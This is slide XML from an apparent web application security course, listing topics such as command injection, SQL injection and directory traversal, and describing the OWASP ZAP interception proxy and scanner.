              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36772178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OWASP ZAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1066800"/>
            <a:ext cx="8686800" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Zed Attack Proxy is the flagship OWASP interception proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Replacing WebScarab after </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>the project was abandoned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Available at</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>http://www.owasp.org/index.php/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>OWASP_Zed_Attack_Proxy_Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Interception is the beginning of a robust feature set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Automated and Passive Scanners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>AJAX and traditional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Spidering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Powerful Fuzzer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5793590" y="1595120"/>
            <a:ext cx="3159910" cy="2282825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21038752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the Interface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="650874" y="1364380"/>
            <a:ext cx="7413625" cy="5355851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="7358251" y="3722896"/>
            <a:ext cx="1260475" cy="276999"/>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a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>HTTP Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1510403">
            <a:off x="6420039" y="3708609"/>
            <a:ext cx="835025" cy="503237"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49994"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1494026" y="4009608"/>
            <a:ext cx="1260475" cy="461665"/>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a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Sites and pages visited</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="6594017">
            <a:off x="1032064" y="3623677"/>
            <a:ext cx="835025" cy="503237"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49994"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="7693025" y="5415171"/>
            <a:ext cx="1260475" cy="276999"/>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a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1510403">
            <a:off x="6754813" y="5400884"/>
            <a:ext cx="835025" cy="503237"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49994"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8780629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075" y="125104"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scanning and Notes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="2333394"/>
            <a:ext cx="5803900" cy="3741090"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>ZAP has an active scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Fuzzes various inputs to find security flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Decent at finding low hanging fruit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>And some advanced items</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Allows for input of tester notes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>For manually discovered issues</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="889000" y="1049630"/>
            <a:ext cx="7143750" cy="1325270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5802794" y="2374900"/>
            <a:ext cx="3150706" cy="4403725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24112214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041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
